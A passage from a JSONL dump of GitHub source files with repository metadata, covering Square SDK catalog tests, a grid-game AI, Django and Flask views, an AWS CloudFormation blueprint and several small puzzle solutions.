co.modifier_list_data = ml\n return co\n\n def build_syrups(self):\n hzmm = CatalogModifier()\n hzmm.name = 'Hazelnut'\n hzm = CatalogObject()\n hzm.type = 'MODIFIER'\n hzm.id = self.CLIENT_ID_HAZELNUT\n hzm.modifier_data = hzmm\n\n vnmm = CatalogModifier()\n vnmm.name = 'Vanilla'\n vnm = CatalogObject()\n vnm.type = 'MODIFIER'\n vnm.id = self.CLIENT_ID_VANILLA\n vnm.modifier_data = vnmm\n\n chmm = CatalogModifier()\n chmm.name = 'Chocolate'\n chm = CatalogObject()\n chm.type = 'MODIFIER'\n chm.id = self.CLIENT_ID_CHOCOLATE\n chm.modifier_data = chmm\n\n ml = CatalogModifierList()\n ml.name = 'Syrups'\n ml.modifiers = [hzm, vnm, chm]\n\n co = CatalogObject()\n co.type = 'MODIFIER_LIST'\n co.id = self.CLIENT_ID_SYRUPS\n co.modifier_list_data = ml\n return co\n\n def build_coffee(self):\n c = CatalogObject()\n c.type = 'ITEM'\n c.id = self.CLIENT_ID_COFFEE\n c.present_at_all_locations = True\n\n sciv = CatalogItemVariation()\n sciv.item_id = c.id\n sciv.name = 'Small'\n sciv.pricing_type = 'FIXED_PRICING'\n sciv.price_money = Money(195, 'USD')\n sc = CatalogObject()\n sc.type = 'ITEM_VARIATION'\n sc.id = self.CLIENT_ID_COFFEE_SMALL\n sc.present_at_all_locations = True\n sc.item_variation_data = sciv\n\n lciv = CatalogItemVariation()\n lciv.item_id = c.id\n lciv.name = 'Large'\n lciv.pricing_type = 'FIXED_PRICING'\n lciv.price_money = Money(250, 'USD')\n lc = CatalogObject()\n lc.type = 'ITEM_VARIATION'\n lc.id = self.CLIENT_ID_COFFEE_LARGE\n lc.present_at_all_locations = True\n lc.item_variation_data = lciv\n\n cimli = CatalogItemModifierListInfo()\n cimli.modifier_list_id = self.CLIENT_ID_MILKS\n\n ci = CatalogItem()\n ci.name = 'Coffee'\n ci.description = 'Hot bean juice'\n ci.abbreviation = 'Co'\n ci.category_id = self.CLIENT_ID_BEVERAGES\n ci.modifier_list_info = [cimli]\n ci.tax_ids = [self.CLIENT_ID_SALES_TAX]\n ci.variations = [sc, lc]\n\n c.item_data = ci\n return c\n\n def build_tea(self):\n c = CatalogObject()\n c.type = 'ITEM'\n c.id = self.CLIENT_ID_TEA\n c.present_at_all_locations = True\n\n stiv = CatalogItemVariation()\n stiv.item_id = c.id\n stiv.name = 'Small'\n stiv.pricing_type = 'FIXED_PRICING'\n stiv.price_money = Money(150, 'USD')\n st = CatalogObject()\n st.type = 'ITEM_VARIATION'\n st.id = self.CLIENT_ID_TEA_SMALL\n st.present_at_all_locations = True\n st.item_variation_data = stiv\n\n ltiv = CatalogItemVariation()\n ltiv.item_id = c.id\n ltiv.name = 'Large'\n ltiv.pricing_type = 'FIXED_PRICING'\n ltiv.price_money = Money(200, 'USD')\n lt = CatalogObject()\n lt.type = 'ITEM_VARIATION'\n lt.id = self.CLIENT_ID_TEA_LARGE\n lt.present_at_all_locations = True\n lt.item_variation_data = ltiv\n\n cimli = CatalogItemModifierListInfo()\n cimli.modifier_list_id = self.CLIENT_ID_MILKS\n\n ci = CatalogItem()\n ci.name = 'Tea'\n ci.description = 'Hot leaf juice'\n ci.abbreviation = 'Te'\n ci.category_id = self.CLIENT_ID_BEVERAGES\n ci.modifier_list_info = [cimli]\n ci.tax_ids = [self.CLIENT_ID_SALES_TAX]\n ci.variations = [st, lt]\n\n c.item_data = ci\n return c\n\n def build_sales_tax(self):\n co = CatalogObject()\n co.type = 'TAX'\n co.id = self.CLIENT_ID_SALES_TAX\n co.present_at_all_locations = True\n\n t = CatalogTax()\n t.name = 'Sales Tax'\n t.calculation_phase = 'TAX_SUBTOTAL_PHASE'\n t.inclusion_type = 'ADDITIVE'\n t.percentage = '5.0'\n t.applies_to_custom_amounts = True\n t.enabled = True\n\n co.tax_data = t\n return co\n\n def build_test_catalog(self):\n self.test_objects = [\n self.build_beverages(),\n self.build_milks(),\n self.build_syrups(),\n self.build_coffee(),\n self.build_tea(),\n self.build_sales_tax()\n ]\n batch = CatalogObjectBatch(self.test_objects)\n batches = [batch]\n req = BatchUpsertCatalogObjectsRequest(str(uuid.uuid4()), batches)\n res = self.api.batch_upsert_catalog_objects(req)\n self.assertIsNone(res.errors)\n for m in res.id_mappings:\n self.objects_by_client_id[m.client_object_id] = m.object_id\n\n def delete_test_catalog(self):\n while True:\n res = self.api.list_catalog()\n if res.objects is None:\n break\n ids = set()\n self.assertIsNone(res.errors)\n for co in res.objects:\n ids.add(co.id)\n delete_request = BatchDeleteCatalogObjectsRequest()\n delete_request.object_ids = list(ids)\n self.api.batch_delete_catalog_objects(delete_request)\n\n def setUp(self):\n account = self.accounts['US-Prod']\n self.api = squareconnect.apis.catalog_api.CatalogApi()\n self.api.api_client.configuration.access_token = account['access_token']\n self.delete_test_catalog()\n self.build_test_catalog()\n\n def tearDown(self):\n self.delete_test_catalog()\n\n def test_batch_delete_catalog_objects(self):\n ids = self.objects_by_client_id\n coffee_id = ids[self.CLIENT_ID_COFFEE]\n small_coffee_id = ids[self.CLIENT_ID_COFFEE_SMALL]\n large_coffee_id = ids[self.CLIENT_ID_COFFEE_LARGE]\n small_tea_id = ids[self.CLIENT_ID_TEA_SMALL]\n\n delete_request = BatchDeleteCatalogObjectsRequest()\n delete_request.object_ids = [coffee_id, small_tea_id]\n response = self.api.batch_delete_catalog_objects(delete_request)\n self.assertIsNone(response.errors)\n self.assertEqual(4, len(response.deleted_object_ids))\n self.assertIn(coffee_id, response.deleted_object_ids)\n self.assertIn(small_coffee_id, response.deleted_object_ids)\n self.assertIn(large_coffee_id, response.deleted_object_ids)\n self.assertIn(small_tea_id, response.deleted_object_ids)\n\n def test_batch_retrieve_catalog_objects(self):\n ids = self.objects_by_client_id\n coffee_id = ids[self.CLIENT_ID_COFFEE]\n sales_tax_id = ids[self.CLIENT_ID_SALES_TAX]\n beverages_id = ids[self.CLIENT_ID_BEVERAGES]\n milks_id = ids[self.CLIENT_ID_MILKS]\n\n request = BatchRetrieveCatalogObjectsRequest([coffee_id, sales_tax_id])\n response = self.api.batch_retrieve_catalog_objects(request)\n\n self.assertEqual(2, len(response.objects))\n\n coffee = response.objects[0]\n self.assertEqual(coffee.type, 'ITEM')\n self.assertEqual(coffee_id, coffee.id)\n self.assertIsNotNone(coffee.updated_at)\n self.assertNotEqual(coffee.version, 0)\n self.assertFalse(coffee.is_deleted)\n self.assertIsNone(coffee.catalog_v1_ids)\n self.assertTrue(coffee.present_at_all_locations)\n self.assertIsNone(coffee.present_at_location_ids)\n self.assertIsNone(coffee.absent_at_location_ids)\n\n self.assertEqual('Coffee', coffee.item_data.name)\n self.assertEqual('Hot bean juice', coffee.item_data.description)\n self.assertEqual('Co', coffee.item_data.abbreviation)\n self.assertIsNone(coffee.item_data.label_color)\n self.assertIsNone(coffee.item_data.available_online)\n self.assertIsNone(coffee.item_data.available_for_pickup)\n self.assertIsNone(coffee.item_data.available_electronically)\n self.assertEqual(beverages_id, coffee.item_data.category_id)\n self.assertEqual(1, len(coffee.item_data.tax_ids))\n self.assertEqual(sales_tax_id, coffee.item_data.tax_ids[0])\n self.assertEqual(1, len(coffee.item_data.modifier_list_info))\n mod_list_info = coffee.item_data.modifier_list_info[0]\n self.assertEqual(milks_id, mod_list_info.modifier_list_id)\n self.assertIsNone(mod_list_info.modifier_overrides)\n self.assertIsNone(mod_list_info.min_selected_modifiers)\n self.assertIsNone(mod_list_info.max_selected_modifiers)\n self.assertIsNone(mod_list_info.enabled)\n\n self.assertEqual(2, len(coffee.item_data.variations))\n\n variation0 = coffee.item_data.variations[0].item_variation_data\n self.assertEqual('Small', variation0.name)\n self.assertEqual('FIXED_PRICING', variation0.pricing_type)\n self.assertEqual(195, variation0.price_money.amount)\n self.assertEqual('USD', variation0.price_money.currency)\n\n variation1 = coffee.item_data.variations[1].item_variation_data\n self.assertEqual('Large', variation1.name)\n self.assertEqual('FIXED_PRICING', variation1.pricing_type)\n self.assertEqual(250, variation1.price_money.amount)\n self.assertEqual('USD', variation1.price_money.currency)\n\n self.assertIsNone(coffee.category_data)\n self.assertIsNone(coffee.item_variation_data)\n self.assertIsNone(coffee.tax_data)\n self.assertIsNone(coffee.discount_data)\n self.assertIsNone(coffee.modifier_list_data)\n self.assertIsNone(coffee.modifier_data)\n\n sales_tax = response.objects[1]\n self.assertEqual('TAX', sales_tax.type)\n self.assertEqual(sales_tax_id, sales_tax.id)\n self.assertEqual('Sales Tax', sales_tax.tax_data.name)\n\n def test_batch_upsert_catalog_objects(self):\n batches = []\n num_objects = 0\n for batch_num in range(3):\n objects = []\n batch = CatalogObjectBatch(objects)\n batches.append(batch)\n for i in range(100):\n item_id = '#Items-{}-{}'.format(batch_num, i)\n variation_id = '#ItemVariation-{}-{}'.format(batch_num, i)\n\n item = CatalogObject()\n item.type = 'ITEM'\n item.id = item_id\n\n item_data = CatalogItem()\n item_data.name = 'Item-{}-{}'.format(batch_num, i)\n item.item_data = item_data\n\n variation = CatalogObject()\n variation.type = 'VARIATION'\n variation.id = variation_id\n\n variation_data = CatalogItemVariation()\n variation_data.item_id = item_id\n variation_data.name = 'Regular'\n variation_data.pricing_type = 'VARIABLE_PRICING'\n variation.item_variation_data = variation_data\n\n objects.append(item)\n num_objects += 1\n\n req = BatchUpsertCatalogObjectsRequest(str(uuid.uuid4()), batches)\n res = self.api.batch_upsert_catalog_objects(req)\n self.assertIsNone(res.errors)\n\n self.assertEquals(num_objects, len(res.objects))\n\n def test_catalog_info(self):\n ci = self.api.catalog_info()\n self.assertIsNone(ci.errors)\n limits = ci.limits\n self.assertEqual(200, limits.batch_delete_max_object_ids)\n self.assertEqual(1000, limits.batch_retrieve_max_object_ids)\n self.assertEqual(1000, limits.batch_upsert_max_objects_per_batch)\n self.assertEqual(10000, limits.batch_upsert_max_total_objects)\n self.assertEqual(1000, limits.search_max_page_limit)\n self.assertEqual(1000, limits.update_item_modifier_lists_max_item_ids)\n self.assertEqual(1000, limits.update_item_modifier_lists_max_modifier_lists_to_disable)\n self.assertEqual(1000, limits.update_item_modifier_lists_max_modifier_lists_to_enable)\n self.assertEqual(1000, limits.update_item_taxes_max_item_ids)\n self.assertEqual(1000, limits.update_item_taxes_max_taxes_to_disable)\n self.assertEqual(1000, limits.update_item_taxes_max_taxes_to_enable)\n\n def test_delete_catalog_object(self):\n ids = self.objects_by_client_id\n coffee_id = ids[self.CLIENT_ID_COFFEE]\n small_coffee_id = ids[self.CLIENT_ID_COFFEE_SMALL]\n large_coffee_id = ids[self.CLIENT_ID_COFFEE_LARGE]\n res = self.api.delete_catalog_object(coffee_id)\n\n self.assertEquals(3, len(res.deleted_object_ids))\n self.assertIn(coffee_id, res.deleted_object_ids)\n self.assertIn(small_coffee_id, res.deleted_object_ids)\n self.assertIn(large_coffee_id, res.deleted_object_ids)\n\n def test_list_catalog(self):\n res = self.api.list_catalog()\n self.assertEqual(len(self.test_objects), len(res.objects))\n\n def test_retrieve_catalog_object(self):\n ids = self.objects_by_client_id\n coffee_id = ids[self.CLIENT_ID_COFFEE]\n res = self.api.retrieve_catalog_object(coffee_id,\n include_related_objects=True)\n self.assertIsNone(res.errors)\n self.assertEquals(coffee_id, res.object.id)\n self.assertEqual(3, len(res.related_objects))\n\n got_milks = False\n got_sales_tax = False\n got_beverages = False\n for obj in res.related_objects:\n if obj.type == 'MODIFIER_LIST'\\\n and obj.modifier_list_data.name == 'Milks':\n got_milks = True\n elif obj.type == 'TAX'\\\n and obj.tax_data.name == 'Sales Tax':\n got_sales_tax = True\n elif obj.type == 'CATEGORY' \\\n and obj.category_data.name == 'Beverages':\n got_beverages = True\n\n self.assertTrue(got_milks)\n self.assertTrue(got_sales_tax)\n self.assertTrue(got_beverages)\n\n def test_search_catalog_objects(self):\n req1 = SearchCatalogObjectsRequest()\n prefix_query = CatalogQueryPrefix()\n prefix_query.attribute_name = 'name'\n prefix_query.attribute_prefix = 'Sm'\n query1 = CatalogQuery()\n query1.prefix_query = prefix_query\n req1.query = query1\n req1.include_deleted_objects = False\n req1.include_related_objects = False\n\n res1 = self.api.search_catalog_objects(req1)\n self.assertEqual(2, len(res1.objects))\n self.assertEqual('ITEM_VARIATION', res1.objects[0].type)\n self.assertEqual('Small', res1.objects[0].item_variation_data.name)\n self.assertEqual('ITEM_VARIATION', res1.objects[1].type)\n self.assertEqual('Small', res1.objects[1].item_variation_data.name)\n\n req2 = SearchCatalogObjectsRequest()\n items_for_tax_query = CatalogQueryItemsForTax()\n items_for_tax_query.tax_ids = [self.objects_by_client_id[self.CLIENT_ID_SALES_TAX]]\n query2 = CatalogQuery()\n query2.items_for_tax_query = items_for_tax_query\n req2.query = query2\n req2.include_deleted_objects = False\n req2.include_related_objects = False\n\n res2 = self.api.search_catalog_objects(req2)\n self.assertEqual(2, len(res2.objects))\n self.assertEqual('ITEM', res2.objects[0].type)\n self.assertEqual('ITEM', res2.objects[1].type)\n\n got_coffee = False\n got_tea = False\n for obj in res2.objects:\n if obj.item_data.name == 'Coffee':\n got_coffee = True\n elif obj.item_data.name == 'Tea':\n got_tea = True\n self.assertTrue(got_coffee)\n self.assertTrue(got_tea)\n\n def test_update_item_modifier_lists(self):\n ids = self.objects_by_client_id\n coffee_id = ids[self.CLIENT_ID_COFFEE]\n milks_id = ids[self.CLIENT_ID_MILKS]\n syrups_id = ids[self.CLIENT_ID_SYRUPS]\n res1 = self.api.retrieve_catalog_object(coffee_id,\n include_related_objects=False)\n self.assertIsNone(res1.errors)\n self.assertEqual(1, len(res1.object.item_data.modifier_list_info))\n ml_id = res1.object.item_data.modifier_list_info[0].modifier_list_id\n self.assertEquals(milks_id, ml_id)\n\n req = UpdateItemModifierListsRequest()\n req.item_ids = [coffee_id]\n req.modifier_lists_to_disable = [milks_id]\n req.modifier_lists_to_enable = [syrups_id]\n res_update = self.api.update_item_modifier_lists(req)\n self.assertIsNone(res_update.errors)\n\n res2 = self.api.retrieve_catalog_object(coffee_id,\n include_related_objects=False)\n self.assertIsNone(res2.errors)\n self.assertEqual(1, len(res2.object.item_data.modifier_list_info))\n ml_id = res2.object.item_data.modifier_list_info[0].modifier_list_id\n self.assertEquals(syrups_id, ml_id)\n\n def test_update_item_taxes(self):\n ids = self.objects_by_client_id\n coffee_id = ids[self.CLIENT_ID_COFFEE]\n sales_tax_id = ids[self.CLIENT_ID_SALES_TAX]\n res1 = self.api.retrieve_catalog_object(coffee_id,\n include_related_objects=False)\n self.assertIsNone(res1.errors)\n self.assertEqual(1, len(res1.object.item_data.tax_ids))\n\n req = UpdateItemTaxesRequest()\n req.item_ids = [coffee_id]\n req.taxes_to_disable = [sales_tax_id]\n res_update = self.api.update_item_taxes(req)\n self.assertIsNone(res_update.errors)\n\n res2 = self.api.retrieve_catalog_object(coffee_id,\n include_related_objects=False)\n self.assertIsNone(res2.errors)\n self.assertIsNone(res2.object.item_data.tax_ids)\n\n def test_upsert_catalog_object(self):\n obj = CatalogObject()\n obj.type = 'DISCOUNT'\n obj.id = self.CLIENT_ID_DISCOUNT\n discount = CatalogDiscount()\n discount.name = 'Half Off'\n discount.percentage = '50.0'\n obj.discount_data = discount\n req = UpsertCatalogObjectRequest(str(uuid.uuid4()), obj)\n res = self.api.upsert_catalog_object(req)\n\n self.assertEqual('Half Off', res.catalog_object.discount_data.name)\n self.assertIsNotNone(res.catalog_object.id)\n self.assertIsNotNone(res.catalog_object.updated_at)\n self.assertIsNotNone(res.catalog_object.version)\n self.assertIsNotNone(res.catalog_object.is_deleted)\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"square/connect-python-sdk","sub_path":"test/test_catalog_api.py","file_name":"test_catalog_api.py","file_ext":"py","file_size_in_byte":21517,"program_lang":"python","lang":"en","doc_type":"code","stars":44,"dataset":"github-code","pt":"52"} +{"seq_id":"42939239264","text":"# ai.py\n#\n# Author: Fabian Meyer\n# Created On: 21 Feb 2019\n\nimport numpy as np\nfrom . import astar\n\nSEARCH_TARGET = 0\nMOVE = 1\n\nclass AI:\n def __init__(self, player):\n self.player = player\n self.path = []\n self.state = SEARCH_TARGET\n self.weight_self = 3\n self.weight_enemy = 6\n self.weight_crossroad = 3\n self.map_positions = np.empty((0, 0))\n self.bomb_times = np.empty((0, 0))\n\n def __update_map_positions(self, map):\n if map.size != self.map_positions.shape:\n width, height = map.size\n self.map_positions = np.empty((width, height, 2))\n self.map_positions[:, :, 0] = np.arange(width) \\\n .reshape(1, width).repeat(height, 0)\n self.map_positions[:, :, 1] = np.arange(height) \\\n .reshape(height, 1).repeat(width, 1)\n\n def __update_bomb_times(self, bombs, map):\n if map.size != self.bomb_times.shape:\n self.bomb_times = np.empty(map.size, dtype=np.int)\n\n self.bomb_times[:, :] = 1e16\n # define the four diections west, east, south, north\n directions = np.array([(1, 0), (-1, 0), (0, 1), (0, -1)])\n for bomb in bombs:\n pos = bomb.pos\n self.bomb_times[pos[0], pos[1]] = bomb.time\n for dir in directions:\n # try to spread the explosions as far as possible\n for delta in range(1, bomb.range):\n npos = pos + dir * delta\n # check if the position is valid, if not stop explosion\n # spread here\n if not map.is_valid(npos) or map.is_blocked(npos) or \\\n map.has_explosion(npos):\n break\n self.bomb_times[pos[0], pos[1]] = bomb.time\n\n def update(self, world):\n self.player.drop_bomb = False\n self.player.move[:] = 0\n\n if self.state == MOVE:\n if self.path:\n next_pos = self.path.pop(0)\n if world.map.is_blocked(next_pos) or world.map.has_explosion(next_pos):\n self.path = []\n self.state = SEARCH_TARGET\n\n next_pos = np.array(next_pos, dtype=np.int)\n self.player.move = next_pos - self.player.pos\n else:\n self.player.drop_bomb = True\n self.state = SEARCH_TARGET\n\n if self.state == SEARCH_TARGET:\n # init score board, each tile gets a score the maximum is chosen as\n # target\n score = np.zeros(world.map.size)\n # get mask of tiles which are not blocked\n unblock = ~world.map.blocked\n width, height = score.shape\n\n # create array of tile positions, create lazily\n self.__update_map_positions(world.map)\n self.__update_bomb_times(world.bombs, world.map)\n\n # calculate distances of this player to all other tiles (manhatten)\n self_dist = np.abs(self.map_positions - self.player.pos).sum(2)\n # normalize distances into interval [0,1]\n self_dist /= self_dist.max()\n # make shortest distances have greates value\n self_dist -= 1\n self_dist *= -1\n\n # check if there are any other players than this one\n if len(world.players) > 1:\n # calculate distances of all enemies to all other tiles\n enemy_dist = []\n for enemy in world.players:\n # check if this player is not the one controlled by ai\n if enemy.id != self.player.id:\n diff = self.map_positions - enemy.pos\n dist = np.abs(diff).sum(2)\n enemy_dist.append(dist)\n\n # convert distance to numpy array\n enemy_dist = np.array(enemy_dist)\n # find element wise minimum of all player distances\n enemy_dist = np.min(enemy_dist, axis=0)\n # normalize distances into interval [0,1]\n enemy_dist /= enemy_dist.max()\n # make shortest distances have greates value\n enemy_dist -= 1\n enemy_dist *= -1\n else:\n # no enemies, distances are zero\n enemy_dist = np.zeros((width, height))\n\n # detect how many neighbouring unblocked tiles each tile has\n crossroads = np.zeros((width, height))\n # add +1 if left neighbour is not blocked\n crossroads[1:, :] += unblock[:-1, :] * 1\n # add +1 if right neighbour is not blocked\n crossroads[:-1, :] += unblock[1:, :] * 1\n # add +1 if upper neighbour is not blocked\n crossroads[:, 1:] += unblock[:, :-1] * 1\n # add +1 if lower neighbour is not blocked\n crossroads[:, :-1] += unblock[:, 1:] * 1\n # normalize into interval [0,1]\n crossroads /= 4\n\n # calculate score as weighted sum\n score += self.weight_self * self_dist\n score += self.weight_enemy * enemy_dist\n score += self.weight_crossroad * crossroads\n # set all blocked tiles to zero\n score[world.map.blocked] = 0\n\n def is_valid(node, path):\n return world.map.is_valid(node) and \\\n not world.map.is_blocked(node) and \\\n not world.map.has_explosion(node) and \\\n self.bomb_times[node[0], node[1]] - len(path) - 1 > 0\n\n found = False\n iterations = 0\n while not found and iterations < 10:\n # retrieve tile with maximum score\n target = np.unravel_index(np.argmax(score), score.shape)\n # set score to 0\n score[target[0], target[1]] = 0\n\n # search path with astar\n self.path = astar.search(self.player.pos, target,\n is_valid=is_valid)\n if self.path:\n self.state = MOVE\n found = True\n iterations += 1\n\n if not found:\n print('No path found!')\n","repo_name":"JeFaProductions/bombgame2","sub_path":"bombgame/ai.py","file_name":"ai.py","file_ext":"py","file_size_in_byte":6251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5814799527","text":"# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution(object):\n def diameterOfBinaryTree(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: int\n \"\"\"\n self.best = 0\n self.map = {}\n self.depth(root)\n return self.best\n \n def depth(self, root):\n if not root:\n return 0\n if root in self.map: ######optimization, using hash table\n return self.map[root]\n \n left = self.depth(root.left)\n right = self.depth(root.right)\n self.best = max(self.best, left + right)\n self.map[root] = 1 + max(left, right)\n return self.map[root]\n","repo_name":"shaniavina/Leetcode_Python","sub_path":"diameter_of_binary_tree.py","file_name":"diameter_of_binary_tree.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70724726244","text":"import json\nimport datetime\nfrom django.shortcuts import render\nfrom upload.models import MusicList\nfrom django.http import Http404, HttpResponse\nfrom soundcore.models import LibraryGenerator\nfrom django.contrib.auth.decorators import login_required\n\n\n# Create your views here.\n\n\ndef soundcore_home(request):\n if request.method == \"GET\":\n musics = MusicList.objects.all()\n return render(request, \"soundcore/index.html\", {\"musics\": musics})\n\n elif request.method == \"POST\":\n raise Http404\n\n\n@login_required()\ndef library_show(request):\n if request.method == \"GET\":\n data = LibraryGenerator.objects.filter(owner=request.user)\n return render(request, \"soundcore/library/index.html\", {\"data\": data})\n elif request.method == \"POST\":\n raise Http404\n\n\n@login_required()\ndef library_items_show(request, short_url: str):\n if request.method == \"GET\":\n data = LibraryGenerator.objects.get(short_form=short_url)\n if not (data.owner == request.user):\n raise Http404\n\n return render(request, \"soundcore/library/items/index.html\", {\"data\": data})\n elif request.method == \"POST\":\n raise Http404\n\n\n@login_required()\ndef library_create(request):\n if request.method == \"POST\":\n database = LibraryGenerator(owner=request.user)\n database.last_modified = datetime.datetime.now()\n database.save()\n\n post_data = dict(request.POST.lists())\n\n for _ in post_data:\n post_data_json = json.loads(_)\n post_data_song_array = post_data_json[\"array\"]\n post_data_library_name = post_data_json[\"name\"]\n database.name = post_data_library_name\n\n for __ in post_data_song_array:\n database.musics.add(MusicList.objects.get(id=__))\n database.save()\n return HttpResponse(status=200)\n elif request.method == \"GET\":\n musics = MusicList.objects.all()\n return render(\n request, \"soundcore/library/create/index.html\", {\"musics\": musics}\n )\n","repo_name":"baseplate-admin/Django-Archive","sub_path":"06 - SoundCore/soundcore/soundcore/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2061,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"36297516286","text":"example_input = '''\\\n1 + (2 * 3) + (4 * (5 + 6))\n'''\n\n\ndef eval(equation, precedence):\n equation = equation.strip().split(\" \")\n # print(equation)\n operators, postfix = [], []\n # convert to postfix then evaluate\n for token in equation:\n if str.isdigit(token):\n postfix.append(token)\n elif token == \"(\":\n operators.append(token)\n elif token == \")\":\n op = operators.pop()\n while op != \"(\":\n postfix.append(op)\n op = operators.pop()\n else:\n while len(operators) > 0 and precedence[operators[-1]] >= precedence[token]:\n postfix.append(operators.pop())\n\n operators.append(token)\n\n while len(operators) > 0:\n postfix.append(operators.pop())\n\n # print(postfix)\n\n # eval postfix\n operands = {\"*\": _multiply,\n \"+\": _add,\n \"-\": _subtract\n }\n operands = []\n for token in postfix:\n if str.isdigit(token):\n operands.append(int(token))\n else:\n lhs = operands.pop()\n rhs = operands.pop()\n operands.append(small_evaluate(rhs, lhs, token))\n\n return int(operands[0])\n\n\ndef small_evaluate(rhs, lhs, op):\n operands = {\"*\": _multiply,\n \"+\": _add,\n \"-\": _subtract\n }\n return str(operands[op](int(rhs), int(lhs)))\n\n\ndef _multiply(rhs, lhs):\n return rhs * lhs\n\n\ndef _add(rhs, lhs):\n return rhs + lhs\n\n\ndef _subtract(rhs, lhs):\n return rhs - lhs\n\n\nif __name__ == '__main__':\n p1_precedence = {\"+\": 2,\n \"*\": 2,\n \"(\": 1\n }\n p2_precedence = {\"+\": 3,\n \"*\": 2,\n \"(\": 1\n }\n\n\n # example_input = example_input.replace(\"(\", \"( \")\n # example_input = example_input.replace(\")\", \" )\")\n # print(eval(example_input, precedence))\n\n input = open(\"day_18_input.txt\").readlines()\n total = 0\n for line in input:\n line = line.replace(\"(\", \"( \")\n line = line.replace(\")\", \" )\")\n total += eval(line, p2_precedence)\n\n print(f\"Result: {total}\")\n","repo_name":"KPHippe/AoC_2020","sub_path":"day_18/operation_order.py","file_name":"operation_order.py","file_ext":"py","file_size_in_byte":2208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"19265824332","text":"import os\nimport time\nimport utils\nimport pandas as pd\n\nif __name__ == \"__main__\":\n start = time.time()\n\n for distance_type in ['center_distance']:\n for window_size in [10, 30, 50, 70]:\n for num_of_steps, num_of_walks in [(5, 10), (10, 5), (15, 3)]:\n file = '../../datasets/' + distance_type + '/window_size_' + str(window_size) + '/' + str(num_of_steps) \\\n + 'steps_' + str(num_of_walks) + 'walks/random_walks.csv'\n print(file)\n if not os.path.exists(file):\n exit(-1)\n\n df = pd.read_csv(file)\n t_sum = 0\n count = 0\n for index, row in df.iterrows():\n t_sum += len(row)\n count += 1\n print(\"\\t\", count, \" - average len \", t_sum / count)\n # break\n\n utils.show_exec_time(start)\n","repo_name":"PanagiotisStasinos/Yago2geo","sub_path":"preprocess/preprocess_utils/check_walks.py","file_name":"check_walks.py","file_ext":"py","file_size_in_byte":911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"33673988789","text":"from troposphere import (\n Base64, GetAtt, FindInMap, Join, Output, Ref, Parameter, Template\n)\nfrom troposphere.s3 import (\n Bucket, PublicRead, WebsiteConfiguration\n)\nfrom troposphere.cloudfront import (\n Distribution, DistributionConfig, Origin, CustomOrigin, CacheBehavior, DefaultCacheBehavior, Cookies, ForwardedValues, S3Origin, Logging\n)\nfrom stacker.blueprints.base import Blueprint\n\nclass s3_and_cloudfront(Blueprint):\n def create_s3_bucket(self):\n t = self.template\n self.s3Bucket = t.add_resource(Bucket(\n \"testS3Bucket2\",\n AccessControl=PublicRead,\n WebsiteConfiguration=WebsiteConfiguration(\n IndexDocument=\"index.html\",\n ErrorDocument=\"error.html\"\n )\n ))\n t.add_output([\n Output(\n \"WebsiteURL\",\n Value=GetAtt(self.s3Bucket, \"WebsiteURL\"),\n Description=\"URL for website hosted on S3\"\n ),\n Output(\n \"S3BucketSecureURL\",\n Value=Join(\"\", [\"http://\", GetAtt(self.s3Bucket, \"DomainName\")]),\n Description=\"Name of S3 bucket to hold website content\"\n ),\n ])\n\n def create_cloudfront_distr(self):\n t = self.template\n self.cloudfrontDistr = t.add_resource(Distribution(\n \"jtdistr\",\n DistributionConfig = DistributionConfig(\n Origins = [Origin(\n Id=\"Origin 1\", \n DomainName=GetAtt(self.s3Bucket, \"DomainName\"),\n S3OriginConfig=S3Origin())\n ],\n DefaultCacheBehavior=DefaultCacheBehavior(\n TargetOriginId=\"Origin 1\",\n ForwardedValues = ForwardedValues(QueryString=False),\n ViewerProtocolPolicy=\"allow-all\"\n ),\n Enabled = True,\n HttpVersion=\"http2\"\n )))\n t.add_output([\n Output(\n \"DistributionId\",\n Value=Ref(self.cloudfrontDistr)\n ),\n Output(\n \"DistributionName\",\n Value=Join(\"\", [\"http://\", GetAtt(self.cloudfrontDistr, \"DomainName\")]))\n ])\n\n def create_template(self):\n self.create_s3_bucket();\n self.create_cloudfront_distr();\n \n","repo_name":"jandelhi/stacker_blueprints","sub_path":"blueprints/s3_and_cloudfront.py","file_name":"s3_and_cloudfront.py","file_ext":"py","file_size_in_byte":2352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5972153595","text":"from flask import Flask,render_template,request\n\n#Flask为一个类,对其进行实例化\napp=Flask(__name__)\n\n#创建了网址下的/base/info和函数index间的关系\n#在浏览器中访问网址+/base/info,网站自动执行index函数中内容\n\n@app.route(\"/base/info\")\ndef index():\n #return \"Web-Day1\"\n #通过render_template,flask会自动打开文件\n #默认去当前项目目录的templates文件夹中读取\n info=[\"王二\",\"sophie\",\"tommy\",\"milliy\"]\n return render_template(\"index.html\",title=\"网页制作\",datalist=info)\n\n@app.route(\"/register\")\ndef register():\n return render_template(\"register.html\")\n\n@app.route(\"/tests/test\",methods=['GET'])\ndef test():\n return render_template(\"test.html\")\n\n@app.route(\"/exec/reg\")\ndef exec_reg():\n #接收用户通过GET形式发送过来的数据\n print(request.args)\n #给用户再返回数据\n return \"success\"\n\n@app.route(\"/exec/post_reg\",methods=[\"POST\"])\ndef exec_post_reg():\n #接收用户通过GET形式发送过来的数据\n print(request.form)\n city=request.form.get(\"city\")\n more = request.form.get(\"more\")\n habit=request.form.getlist(\"habit\")\n print(more,city,habit)\n #给用户再返回数据\n return \"post_success\"\n\nif __name__ == '__main__':\n app.run(host=\"localhost\",port=\"3389\")","repo_name":"zhangtz92/web-test","sub_path":"manage.py","file_name":"manage.py","file_ext":"py","file_size_in_byte":1314,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27083405575","text":"import telebot\nimport os\n\n# 